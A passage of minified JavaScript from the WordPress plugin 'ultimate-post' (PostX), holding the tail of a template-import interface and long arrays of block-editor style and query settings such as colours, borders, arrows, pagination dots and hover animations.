➤"):e.pro&&y?(0,o.createElement)("a",{className:"ultp-btn ultp-btn-sm ultp-btn-success",target:"_blank",href:U,rel:"noreferrer"},__("Get License","ultimate-post")):(0,o.createElement)("span",{onClick:()=>{return t=e.ID,l=e.pro,m({...d,reload:!0,reloadId:t}),void(l?ultp_data.active&&L(t):L(t));var t,l},className:"ultp-btns ultp-btn-import"},i.ZP.arrow_down_line,__("Import","ultimate-post"),b&&v==e.ID?(0,o.createElement)("span",{className:"dashicons dashicons-update rotate"}):"")))))))):w||k?(0,o.createElement)("div",{className:"ultp-premade-grid ultp-templatekit-col3 skeletonOverflow"},Array(6).fill(1).map(((e,t)=>(0,o.createElement)("div",{key:t,className:"ultp-item-list"},(0,o.createElement)("div",{className:"ultp-item-list-overlay"},(0,o.createElement)(a.Z,{type:"custom_size",c_s:{size1:100,unit1:"%",size2:300,unit2:"px"}})),(0,o.createElement)("div",{className:"ultp-item-list-info"},(0,o.createElement)(a.Z,{type:"custom_size",c_s:{size1:50,unit1:"%",size2:25,unit2:"px",br:2}}),(0,o.createElement)("span",{className:"ultp-action-btn"},(0,o.createElement)("span",{className:"ultp-premade-wishlist"},(0,o.createElement)(a.Z,{type:"custom_size",c_s:{size1:30,unit1:"px",size2:25,unit2:"px",br:2}})),(0,o.createElement)(a.Z,{type:"custom_size",c_s:{size1:70,unit1:"px",size2:25,unit2:"px",br:2}}))))))):(0,o.createElement)("span",{className:"ultp-image-rotate"},__("No Data Found…","ultimate-post")))}},87282:(e,t,l)=>{"use strict";l.d(t,{$o:()=>g,D3:()=>s,Eo:()=>L,J$:()=>k,Kq:()=>V,M6:()=>b,MF:()=>U,MQ:()=>_,MS:()=>Z,Oi:()=>W,RP:()=>w,Rd:()=>B,Sg:()=>n,Sk:()=>G,Sv:()=>O,U8:()=>r,Vv:()=>v,WJ:()=>M,Xl:()=>D,YA:()=>A,Zv:()=>E,ag:()=>x,dT:()=>N,do:()=>I,f$:()=>h,fL:()=>y,ff:()=>j,iw:()=>C,jQ:()=>z,kr:()=>F,ly:()=>q,pf:()=>T,qS:()=>S,si:()=>p,sx:()=>H,tp:()=>R,wK:()=>P,yX:()=>f});var o=l(69735);const a="https://www.wpxpo.com/postx/?utm_source=db-postx-editor&utm_medium=quick-query&utm_campaign=postx-dashboard#pricing",{__}=wp.i18n,i={type:"select",key:"metaList",label:__("Meta","ultimate-post"),multiple:!0,options:[{value:"metaAuthor",label:__("Author","ultimate-post")},{value:"metaDate",label:__("Date","ultimate-post")},{value:"metaDateModified",label:__("Modified Date","ultimate-post")},{value:"metaComments",label:__("Comment","ultimate-post")},{value:"metaView",label:__("View Count","ultimate-post")},{value:"metaTime",label:__("Date Time","ultimate-post")},{value:"metaRead",label:__("Reading Time","ultimate-post")}]},n=[{type:"typography",key:"btnTypo",label:__("Typography","ultimate-post")},{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"btnColor",label:__("Color","ultimate-post")},{type:"color2",key:"btnBgColor",label:__("Background Color","ultimate-post")},{type:"border",key:"btnBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"btnRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"boxshadow",key:"btnShadow",label:__("BoxShadow","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"btnHoverColor",label:__("Hover Color","ultimate-post")},{type:"color2",key:"btnBgHoverColor",label:__("Hover Bg Color","ultimate-post")},{type:"border",key:"btnHoverBorder",label:__("Hover Border","ultimate-post")},{type:"dimension",key:"btnHoverRadius",label:__("Hover Radius","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"boxshadow",key:"btnHoverShadow",label:__("Hover BoxShadow","ultimate-post")}]}]},{type:"dimension",key:"btnSacing",label:__("Spacing","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"dimension",key:"btnPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}],r=[{type:"typography",key:"counterTypo",label:__("Typography","ultimate-post")},{type:"color",key:"counterColor",label:__("Color","ultimate-post")},{type:"color2",key:"counterBgColor",label:__("Background Color","ultimate-post")},{type:"range",key:"counterWidth",min:0,max:300,step:1,label:__("Width","ultimate-post")},{type:"range",key:"counterHeight",min:0,max:300,step:1,label:__("Height","ultimate-post")},{type:"border",key:"counterBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"counterRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}],s=[{type:"select",key:"arrowStyle",label:__("Arrow Style","ultimate-post"),options:[{value:"leftAngle#rightAngle",label:__("Style 1","ultimate-post"),icon:"leftAngle"},{value:"leftAngle2#rightAngle2",label:__("Style 2","ultimate-post"),icon:"leftAngle2"},{value:"leftArrowLg#rightArrowLg",label:__("Style 3","ultimate-post"),icon:"leftArrowLg"}]},{type:"separator",key:"separatorStyle"},{type:"range",key:"arrowSize",min:0,max:80,step:1,responsive:!0,unit:!0,label:__("Size","ultimate-post")},{type:"range",key:"arrowWidth",min:0,max:80,step:1,responsive:!0,unit:!0,label:__("Width","ultimate-post")},{type:"range",key:"arrowHeight",min:0,max:80,step:1,responsive:!0,unit:!0,label:__("Height","ultimate-post")},{type:"range",key:"arrowVartical",min:-200,max:1e3,step:1,responsive:!0,unit:!0,label:__("Vertical Position","ultimate-post")},{type:"separator",key:"separatorStyle"},{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"arrowColor",label:__("Color","ultimate-post")},{type:"color",key:"arrowBg",label:__("Background Color","ultimate-post")},{type:"border",key:"arrowBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"arrowRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"boxshadow",key:"arrowShadow",label:__("BoxShadow","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"arrowHoverColor",label:__("Hover Color","ultimate-post")},{type:"color",key:"arrowHoverBg",label:__("Hover Bg Color","ultimate-post")},{type:"border",key:"arrowHoverBorder",label:__("Hover Border","ultimate-post")},{type:"dimension",key:"arrowHoverRadius",label:__("Hover Radius","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"boxshadow",key:"arrowHoverShadow",label:__("Hover BoxShadow","ultimate-post")}]}]}],p=[{type:"range",key:"dotSpace",min:0,max:100,step:1,unit:!0,responsive:!0,label:__("Space","ultimate-post")},{type:"range",key:"dotVartical",min:-200,max:700,step:1,unit:!0,responsive:!0,label:__("Vertical Position","ultimate-post")},{type:"range",key:"dotHorizontal",min:-800,max:800,step:1,unit:!0,responsive:!0,label:__("Horizontal Position","ultimate-post")},{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"range",key:"dotWidth",min:0,max:100,step:1,responsive:!0,label:__("Width","ultimate-post")},{type:"range",key:"dotHeight",min:0,max:100,step:1,unit:!0,responsive:!0,label:__("Height","ultimate-post")},{type:"color",key:"dotBg",label:__("Background Color","ultimate-post")},{type:"border",key:"dotBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"dotRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"boxshadow",key:"dotShadow",label:__("BoxShadow","ultimate-post")}]},{name:"hover",title:__("Active","ultimate-post"),options:[{type:"range",key:"dotHoverWidth",min:0,max:100,step:1,responsive:!0,label:__("Width","ultimate-post")},{type:"range",key:"dotHoverHeight",min:0,max:100,step:1,unit:!0,responsive:!0,label:__("Height","ultimate-post")},{type:"color",key:"dotHoverBg",label:__("Hover Bg Color","ultimate-post")},{type:"border",key:"dotHoverBorder",label:__("Hover Border","ultimate-post")},{type:"dimension",key:"dotHoverRadius",label:__("Hover Radius","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"boxshadow",key:"dotHoverShadow",label:__("Hover BoxShadow","ultimate-post")}]}]}],c=[{value:"related_tag",label:__("Related by Tag (Single Post)","ultimate-post"),pro:!0,link:a},{value:"related_category",label:__("Related by Category (Single Post)","ultimate-post"),pro:!0,link:a},{value:"related_cat_tag",label:__("Related by Category & Tag (Single Post)","ultimate-post"),pro:!0,link:a},{value:"related_posts",label:__("Related by Query Builder (Single Post)","ultimate-post"),pro:!0,link:a}],u=[{value:"popular_post_1_day_view",label:__("Trending Today","ultimate-post"),pro:!0,link:a},{value:"popular_post_7_days_view",label:__("This Week’s Popular Posts","ultimate-post"),pro:!0,link:a},{value:"popular_post_30_days_view",label:__("Top Posts of the Month","ultimate-post"),pro:!0,link:a},{value:"popular_post_all_times_view",label:__("All-Time Favorites","ultimate-post"),pro:!0,link:a},{value:"random_post",label:__("Random Posts","ultimate-post"),pro:!0,link:a},{value:"random_post_7_days",label:__("Random Posts (7 Days)","ultimate-post"),pro:!0,link:a},{value:"random_post_30_days",label:__("Random Posts (30 Days)","ultimate-post"),pro:!0,link:a},{value:"latest_post_published",label:__("Latest Posts - Published Date","ultimate-post"),pro:!0,link:a},{value:"latest_post_modified",label:__("Latest Posts - Last Modified Date","ultimate-post"),pro:!0,link:a},{value:"oldest_post_published",label:__("Oldest Posts - Published Date","ultimate-post"),pro:!0,link:a},{value:"oldest_post_modified",label:__("Oldest Posts - Last Modified Date","ultimate-post"),pro:!0,link:a},{value:"alphabet_asc",label:__("Alphabetical ASC","ultimate-post"),pro:!0,link:a},{value:"alphabet_desc",label:__("Alphabetical DESC","ultimate-post"),pro:!0,link:a},{value:"sticky_posts",label:__("Sticky Post","ultimate-post"),pro:!0,link:a},{value:"most_comment",label:__("Most Comments","ultimate-post"),pro:!0,link:a},{value:"most_comment_1_day",label:__("Most Comments (1 Day)","ultimate-post"),pro:!0,link:a},{value:"most_comment_7_days",label:__("Most Comments (7 Days)","ultimate-post"),pro:!0,link:a},{value:"most_comment_30_days",label:__("Most Comments (30 Days)","ultimate-post"),pro:!0,link:a}],d=[{value:"",label:__("- Select Advance Query -","ultimate-post")}],m=[{value:"title",label:__("Title (Alphabetical)","ultimate-post")},{value:"date",label:__("Date (Published)","ultimate-post")},{value:"modified",label:__("Date (Last Modified)","ultimate-post")},{value:"rand",label:__("Random Posts","ultimate-post")},{value:"post__in",label:__("Post In (Show Post by Post ID Order)","ultimate-post")},{value:"menu_order",label:__("Menu Order (Show Page by Page Attributes)","ultimate-post")},{value:"comment_count",label:__("Comment Count","ultimate-post")}];"archive"!=ultp_data?.archive&&m.push({value:"meta_value_num",label:__("Meta Value Number","ultimate-post")});const g=[{type:"select",key:"queryQuick",label:__("Quick Query","ultimate-post"),options:"page"!=ultp_data.post_type?[...d,...c,...u]:[...d,...u,...c]},{type:"search",key:"queryPosts",pro:!0,search:"posts",label:__("Choose Specific Posts","ultimate-post")},{type:"search",key:"queryCustomPosts",pro:!0,search:"allpost",label:__("Add Custom Sections","ultimate-post")},{type:"range",key:"queryNumPosts",min:-1,max:100,label:__("Post Per Page","ultimate-post"),help:"Number of Posts (per Page)",responsive:!0},{type:"range",key:"queryOffset",min:0,max:50,step:1,help:"Offset Post",label:__("Offset Starting Post","ultimate-post")},{type:"toggle",key:"querySticky",label:__("Ignore Sticky Posts","ultimate-post")},{type:"separator"},{type:"select",key:"queryOrderBy",label:__("Order By","ultimate-post"),options:m},{type:"tag",key:"queryOrder",label:!1,options:[{value:"asc",label:__("Ascending","ultimate-post"),icon:"ascending"},{value:"desc",label:__("Descending","ultimate-post"),icon:"descending"}]},{type:"text",key:"metaKey",label:__("Meta Key","ultimate-post")}],y=[{position:1,data:{type:"select",key:"queryTax",label:__("Taxonomy","ultimate-post"),options:[]}},{position:2,data:{type:"search",key:"queryTaxValue",label:__("Taxonomy Value","ultimate-post"),multiple:!0,search:"taxvalue"}},{position:3,data:{type:"tag",key:"queryRelation",label:__("Taxonomy Relation","ultimate-post"),inline:!0,options:[{value:"OR",label:__("OR","ultimate-post")},{value:"AND",label:__("AND","ultimate-post")}]}},{position:4,data:{type:"search",key:"queryAuthor",search:"author",label:__("Author","ultimate-post")}}],b=[{position:1,data:{type:"search",key:"queryExclude",search:"postExclude",label:__("Exclude Post","ultimate-post")}},{position:2,data:{type:"search",key:"queryExcludeTerm",search:"taxExclude",help:"Exclude Term",label:__("Exclude Taxonomy","ultimate-post"),pro:!0}},{position:3,data:{type:"search",key:"queryExcludeAuthor",search:"author",label:__("Exclude Author","ultimate-post"),pro:!0}}],v=[{position:5,data:{type:"alignment",key:"contentAlign",responsive:!1,label:__("Alignment","ultimate-post"),disableJustify:!0}},{position:4,data:{type:"separator"}},{position:5,data:{type:"range",key:"columns",min:1,max:7,step:1,responsive:!0,label:__("Number Of Columns","ultimate-post")}},{position:7,data:{type:"range",key:"columnGridGap",min:0,max:120,step:1,responsive:!0,unit:["px","em","rem"],label:__("Column Gap","ultimate-post")}},{position:12,data:{type:"toggle",key:"openInTab",label:__("Links Open in New Tabs","ultimate-post")}},{position:13,data:{type:"tag",key:"contentTag",label:__("Content Tag","ultimate-post"),options:[{value:"article",label:"article"},{value:"section",label:"section"},{value:"div",label:"div"}]}}],h=[{type:"alignment",key:"contentAlign",responsive:!1,label:__("Alignment","ultimate-post"),disableJustify:!0,inline:!0},{type:"separator"},{type:"range",key:"columns",min:1,max:7,step:1,responsive:!0,label:__("Number of Columns","ultimate-post")},{type:"range",key:"columnGridGap",min:0,max:120,step:1,responsive:!0,unit:["px","em","rem"],label:__("Column Gap","ultimate-post")},{type:"separator"},{type:"advFilterEnable",key:"advFilterEnable"},{type:"advPagiEnable",key:"advPaginationEnable"},{type:(0,o.o6)()?"toggle":"",label:__("Enable Dynamic Content","ultimate-post"),key:"dcEnabled",help:__("Insert dynamic data & custom fields that update automatically.","ultimate-post")},{type:"toggle",key:"openInTab",label:__("Links Open in New Tabs","ultimate-post")},{type:"separator"},{type:"tag",key:"contentTag",label:__("Content Tag","ultimate-post"),options:[{value:"article",label:"article"},{value:"section",label:"section"},{value:"div",label:"div"}]},{type:"text",key:"notFoundMessage",label:__("No result found Text","ultimate-post")}],f=[{type:"range",key:"columns",min:1,max:7,step:1,responsive:!0,label:__("Columns","ultimate-post")},{type:"range",key:"columnGridGap",min:0,max:120,step:1,responsive:!0,unit:["px","em","rem"],label:__("Column Gap","ultimate-post")},{type:"separator",key:"spaceSep"},{type:"dimension",key:"wrapOuterPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"dimension",key:"wrapMargin",label:__("Margin","ultimate-post"),step:1,unit:!0,responsive:!0}],k=[{type:"range",key:"contenWraptWidth",min:0,max:800,step:1,unit:!0,responsive:!0,label:__("Width","ultimate-post")},{type:"range",key:"contenWraptHeight",min:0,max:500,step:1,unit:!0,responsive:!0,label:__("Height","ultimate-post")},{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"contentWrapBg",label:__("Background Color","ultimate-post")},{type:"border",key:"contentWrapBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"contentWrapRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"boxshadow",key:"contentWrapShadow",label:__("BoxShadow","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"contentWrapHoverBg",label:__("Hover Bg Color","ultimate-post")},{type:"border",key:"contentWrapHoverBorder",label:__("Hover Border","ultimate-post")},{type:"dimension",key:"contentWrapHoverRadius",label:__("Hover Radius","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"boxshadow",key:"contentWrapHoverShadow",label:__("Hover BoxShadow","ultimate-post")}]}]},{type:"dimension",key:"contentWrapInnerPadding",label:__("Inner Padding","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"dimension",key:"contentWrapPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}],w=[{type:"range",key:"headerWidth",min:0,max:600,step:1,responsive:!0,unit:["px","em","rem","%"],label:__("Width","ultimate-post")},{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"headerWrapBg",label:__("Background Color","ultimate-post")},{type:"border",key:"headerWrapBorder",label:__("Border","ultimate-post")},{type:"dimension",key:"headerWrapRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"headerWrapHoverBg",label:__("Hover Bg Color","ultimate-post")},{type:"border",key:"headerWrapHoverBorder",label:__("Hover Border","ultimate-post")},{type:"dimension",key:"headerWrapHoverRadius",label:__("Hover Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]}]},{type:"range",key:"headerSpaceX",min:-100,max:100,step:1,responsive:!0,unit:["px","em","rem","%"],label:__("Space X","ultimate-post")},{type:"range",key:"headerSpaceY",min:0,max:150,step:1,responsive:!0,label:__("Space Y","ultimate-post")},{type:"dimension",key:"headerWrapPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}],x=[{type:"select",key:"vidIconPosition",options:[{label:"Center",value:"center"},{label:"Bottom Right",value:"bottomRight"},{label:"Bottom Left",value:"bottomLeft"},{label:"Top Right",value:"topRight"},{label:"Top Left",value:"topLeft"},{label:"Right Middle",value:"rightMiddle"},{label:"Left Middle",value:"leftMiddle"}],label:__("Video Icon Position","ultimate-post")},{type:"color",key:"popupIconColor",label:__("Icon Color","ultimate-post")},{type:"color",key:"popupHovColor",label:__("Icon Hover Color","ultimate-post")},{type:"range",key:"iconSize",label:__("Icon Size","ultimate-post"),min:0,max:500,step:1,unit:!0,responsive:!0},{type:"separator"},{type:"toggle",key:"popupAutoPlay",label:__("Enable Popup Auto Play","ultimate-post")},{type:"toggle",key:"enablePopup",pro:!0,label:__("Enable Video Popup","ultimate-post")},{type:"range",key:"popupWidth",label:__("Popup Video Width","ultimate-post"),min:0,max:100,step:1,unit:!1,responsive:!0},{type:"separator"},{type:"color",key:"closeIconColor",label:__("Close Icon Color","ultimate-post")},{type:"color",key:"closeHovColor",label:__("Close Hover Color","ultimate-post")},{type:"range",key:"closeSize",label:__("Close Icon Size","ultimate-post"),min:0,max:200,step:1,unit:!0,responsive:!0},{type:"toggle",key:"enablePopupTitle",label:__("Popup Title Enable","ultimate-post")},{type:"color",key:"popupTitleColor",label:__("Title Color","ultimate-post")}],T=[{type:"tag",key:"titleTag",label:__("Title Tag","ultimate-post"),options:[{value:"h1",label:__("H1","ultimate-post")},{value:"h2",label:__("H2","ultimate-post")},{value:"h3",label:__("H3","ultimate-post")},{value:"h4",label:__("H4","ultimate-post")},{value:"h5",label:__("H5","ultimate-post")},{value:"h6",label:__("H6","ultimate-post")},{value:"span",label:__("span","ultimate-post")},{value:"div",label:__("div","ultimate-post")}]},{type:"toggle",key:"titlePosition",label:__("Meta Under Title","ultimate-post")},{type:"range",key:"titleLength",min:0,max:30,step:1,label:__("Max Length","ultimate-post")},{type:"select",key:"titleStyle",label:__("Title Hover Effects","ultimate-post"),options:[{value:"none",label:__("None","ultimate-post")},{value:"style1",label:__("On Hover Underline","ultimate-post"),pro:!0},{value:"style2",label:__("On Hover Wave","ultimate-post"),pro:!0},{value:"style3",label:__("Wave","ultimate-post"),pro:!0},{value:"style4",label:__("underline","ultimate-post"),pro:!0},{value:"style5",label:__("underline and wave","ultimate-post"),pro:!0},{value:"style6",label:__("Underline Background","ultimate-post"),pro:!0},{value:"style7",label:__("Underline Right To Left","ultimate-post"),pro:!0},{value:"style8",label:__("Underline center","ultimate-post"),pro:!0},{value:"style9",label:__("Underline Background 2","ultimate-post"),pro:!0},{value:"style10",label:__("Underline Hover Spacing","ultimate-post"),pro:!0},{value:"style11",label:__("Hover word spacing","ultimate-post"),pro:!0}]},{type:"typography",key:"titleTypo",label:__("Typography","ultimate-post")},{type:"color",key:"titleBackground",label:__("Title BG Color","ultimate-post")},{type:"color",key:"titleColor",label:__("Color","ultimate-post")},{type:"color",key:"titleHoverColor",label:__("Hover Color","ultimate-post")},{type:"color",key:"titleAnimColor",label:__("Animation Color","ultimate-post")},{type:"dimension",key:"titlePadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}],_=(__("Title Tag","ultimate-post"),__("H1","ultimate-post"),__("H2","ultimate-post"),__("H3","ultimate-post"),__("H4","ultimate-post"),__("H5","ultimate-post"),__("H6","ultimate-post"),__("span","ultimate-post"),__("div","ultimate-post"),__("Color","ultimate-post"),__("Hover Color","ultimate-post"),__("Typography","ultimate-post"),__("Padding","ultimate-post"),[{type:"text",key:"prefixText",label:__("Prefix Text","ultimate-post")},{type:"color",key:"prefixColor",label:__("Color","ultimate-post")},{type:"typography",key:"prefixTypo",label:__("Typography","ultimate-post")},{type:"dimension",key:"prefixPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}]),C=[{type:"select",key:"septStyle",label:__("Border Style","ultimate-post"),beside:!0,options:[{value:"none",label:__("None","ultimate-post")},{value:"solid",label:__("Solid","ultimate-post")},{value:"dashed",label:__("Dashed","ultimate-post")},{value:"dotted",label:__("Dotted","ultimate-post")},{value:"double",label:__("Double","ultimate-post")}]},{type:"color",key:"septColor",label:__("Border Color","ultimate-post")},{type:"range",key:"septSize",min:0,max:20,step:1,label:__("Border Size","ultimate-post")},{type:"range",key:"septSpace",min:0,max:80,step:1,responsive:!0,label:__("Spacing","ultimate-post")}],E=[{type:"text",key:"advanceId",label:__("Custom Selector ( ID )","ultimate-post")},{type:"range",key:"advanceZindex",min:-100,max:1e4,step:1,label:__("Z-index","ultimate-post")},{type:"dimension",key:"wrapMargin",label:__("Margin","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"dimension",key:"wrapOuterPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color2",key:"wrapBg",label:__("Background","ultimate-post")},{type:"border",key:"wrapBorder",label:__("Border","ultimate-post")},{type:"boxshadow",key:"wrapShadow",label:__("BoxShadow","ultimate-post")},{type:"dimension",key:"wrapRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color2",key:"wrapHoverBackground",label:__("Background","ultimate-post")},{type:"border",key:"wrapHoverBorder",label:__("Hover Border","ultimate-post")},{type:"boxshadow",key:"wrapHoverShadow",label:__("Hover BoxShadow","ultimate-post")},{type:"dimension",key:"wrapHoverRadius",label:__("Hover Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]}]}],S=[{type:"select",key:"TaxAnimation",label:__("Hover Animation","ultimate-post"),options:[{value:"none",label:__("No Animation","ultimate-post")},{value:"zoomIn",label:__("Zoom In","ultimate-post")},{value:"zoomOut",label:__("Zoom Out","ultimate-post")},{value:"opacity",label:__("Opacity","ultimate-post")},{value:"slideLeft",label:__("Slide Left","ultimate-post")},{value:"slideRight",label:__("Slide Right","ultimate-post")}]},{type:"toggle",key:"customTaxColor",label:__("Taxonomy Specific Color","ultimate-post"),pro:!0},{type:"linkbutton",key:"seperatorTaxLink",placeholder:__("Choose Color","ultimate-post"),label:__("Taxonomy Specific (Pro)","ultimate-post"),text:"Choose Color"},{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"TaxWrapBg",label:__("Background Color","ultimate-post")},{type:"range",key:"customOpacityTax",min:0,max:1,step:.05,label:__("Overlay Opacity","ultimate-post")},{type:"border",key:"TaxWrapBorder",label:__("Border","ultimate-post")},{type:"boxshadow",key:"TaxWrapShadow",label:__("BoxShadow","ultimate-post")},{type:"dimension",key:"TaxWrapRadius",label:__("Border Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"TaxWrapHoverBg",label:__("Hover Bg Color","ultimate-post")},{type:"range",key:"customTaxOpacityHover",min:0,max:1,step:.05,label:__("Hover Opacity","ultimate-post")},{type:"border",key:"TaxWrapHoverBorder",label:__("Hover Border","ultimate-post")},{type:"boxshadow",key:"TaxWrapHoverShadow",label:__("Hover BoxShadow","ultimate-post")},{type:"dimension",key:"TaxWrapHoverRadius",label:__("Hover Radius","ultimate-post"),step:1,unit:!0,responsive:!0}]}]},{type:"dimension",key:"TaxWrapPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}],P=[{data:{type:"tag",key:"relation",label:__("Multiple Filter Relation","ultimate-post"),options:[{value:"AND",label:__("AND","ultimate-post")},{value:"OR",label:__("OR","ultimate-post")}]}},{data:{type:"alignment",key:"align",label:__("Alignment","ultimate-post"),responsive:!0,options:["flex-start","center","flex-end"],icons:["left","center","right"]}},{data:{type:"range",key:"gapChild",min:0,max:120,step:1,responsive:!0,unit:["px","em","rem"],label:__("Gap","ultimate-post")}},{data:{type:"range",key:"spacingTop",min:0,max:120,step:1,responsive:!0,unit:["px","em","rem"],label:__("Spacing Top","ultimate-post")}},{data:{type:"range",key:"spacingBottom",min:0,max:120,step:1,responsive:!0,unit:["px","em","rem"],label:__("Spacing Bottom","ultimate-post")}}],L={...i,pro:!0},I={type:"select",key:"metaStyle",label:__("Meta Style","ultimate-post"),options:[{value:"noIcon",label:__("No Icon","ultimate-post")},{value:"icon",label:__("With Icon","ultimate-post")},{value:"style2",label:__("Style2","ultimate-post")},{value:"style3",label:__("Style3","ultimate-post")},{value:"style4",label:__("Style4","ultimate-post")},{value:"style5",label:__("Style5","ultimate-post")},{value:"style6",label:__("Style6","ultimate-post")}],pro:!0},B={type:"select",key:"metaSeparator",label:__("Separator","ultimate-post"),options:[{value:"dot",label:__("Dot","ultimate-post")},{value:"slash",label:__("Slash","ultimate-post")},{value:"doubleslash",label:__("Double Slash","ultimate-post")},{value:"close",label:__("Close","ultimate-post")},{value:"dash",label:__("Dash","ultimate-post")},{value:"verticalbar",label:__("Vertical Bar","ultimate-post")},{value:"emptyspace",label:__("Empty","ultimate-post")}],pro:!0},U={...i,key:"metaListSmall",label:__("Small Item Meta","ultimate-post"),pro:!0},M={type:"select",key:"catPosition",label:__("Category Position","ultimate-post"),options:[{value:"aboveTitle",label:__("Above Title","ultimate-post")},{value:"topLeft",label:__("Over Image(Top Left)","ultimate-post")},{value:"topRight",label:__("Over Image(Top Right)","ultimate-post")},{value:"bottomLeft",label:__("Over Image(Bottom Left)","ultimate-post")},{value:"bottomRight",label:__("Over Image(Bottom Right)","ultimate-post")},{value:"centerCenter",label:__("Over Image(Center)","ultimate-post")}],pro:!0},A={type:"select",key:"filterType",label:__("Filter Type","ultimate-post"),options:[],pro:!0},H={type:"select",key:"filterValue",label:__("Filter Value","ultimate-post"),options:[],multiple:!0,pro:!0},N={type:"select",key:"navPosition",label:__("Navigation Position","ultimate-post"),options:[{value:"topRight",label:__("Top Right","ultimate-post")},{value:"bottomLeft",label:__("Bottom","ultimate-post")}],pro:!0},j=[{type:"tag",key:"overlayContentPosition",label:__("Content Position","ultimate-post"),disabled:!0,options:[{value:"topPosition",label:__("Top","ultimate-post")},{value:"middlePosition",label:__("Middle","ultimate-post")},{value:"bottomPosition",label:__("Bottom","ultimate-post")}]},{type:"color2",key:"overlayBgColor",label:__("Content Background","ultimate-post"),pro:!0},{type:"dimension",key:"overlayWrapPadding",label:__("Padding","ultimate-post"),step:1,unit:!0,responsive:!0}],Z=[{type:"select",key:"imgAnimation",label:__("Hover Animation","ultimate-post"),options:[{value:"none",label:__("No Animation","ultimate-post")},{value:"zoomIn",label:__("Zoom In","ultimate-post")},{value:"zoomOut",label:__("Zoom Out","ultimate-post")},{value:"opacity",label:__("Opacity","ultimate-post")},{value:"roateLeft",label:__("Rotate Left","ultimate-post")},{value:"rotateRight",label:__("Rotate Right","ultimate-post")},{value:"slideLeft",label:__("Slide Left","ultimate-post")},{value:"slideRight",label:__("Slide Right","ultimate-post")}]},{type:"range",key:"imgWidth",min:0,max:2e3,step:1,responsive:!0,unit:["px","em","rem","%"],label:__("Width","ultimate-post")},{type:"range",key:"imgHeight",min:0,max:2e3,step:1,responsive:!0,unit:["px","em","rem","%"],label:__("Height","ultimate-post")},{type:"tag",key:"imageScale",label:__("Image scale","ultimate-post"),options:[{value:"",label:__("None","ultimate-post")},{value:"cover",label:__("Cover","ultimate-post")},{value:"contain",label:__("Contain","ultimate-post")},{value:"fill",label:__("Fill","ultimate-post")}]},{type:"tab",key:"imgTab",content:[{name:"Normal",title:__("Normal","ultimate-post"),options:[{type:"range",key:"imgGrayScale",label:__("Gray Scale","ultimate-post"),min:0,max:100,step:1,unit:["%"],responsive:!0},{type:"dimension",key:"imgRadius",label:__("Radius","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"boxshadow",key:"imgShadow",label:__("BoxShadow","ultimate-post")}]},{name:"tab2",title:__("Hover","ultimate-post"),options:[{type:"range",key:"imgHoverGrayScale",label:__("Hover Gray Scale","ultimate-post"),min:0,max:100,step:1,unit:["%"],responsive:!0},{type:"dimension",key:"imgHoverRadius",label:__("Hover Radius","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"boxshadow",key:"imgHoverShadow",label:__("Hover BoxShadow","ultimate-post")}]}]},{type:"dimension",key:"imgMargin",label:__("Margin","ultimate-post"),step:1,unit:!0,responsive:!0},{type:"toggle",key:"imgOverlay",label:__("Overlay","ultimate-post")},{type:"select",key:"imgOverlayType",label:__("Overlay Type","ultimate-post"),options:[{value:"default",label:__("Default","ultimate-post")},{value:"simgleGradient",label:__("Simple Gradient","ultimate-post")},{value:"multiColour",label:__("Multi Color","ultimate-post")},{value:"flat",label:__("Flat","ultimate-post")},{value:"custom",label:__("Custom","ultimate-post")}]},{type:"color2",key:"overlayColor",label:__("Custom Color","ultimate-post")},{type:"range",key:"imgOpacity",min:0,max:1,step:.05,label:__("Overlay Opacity","ultimate-post")},{type:"toggle",key:"imgSrcset",label:__("Enable 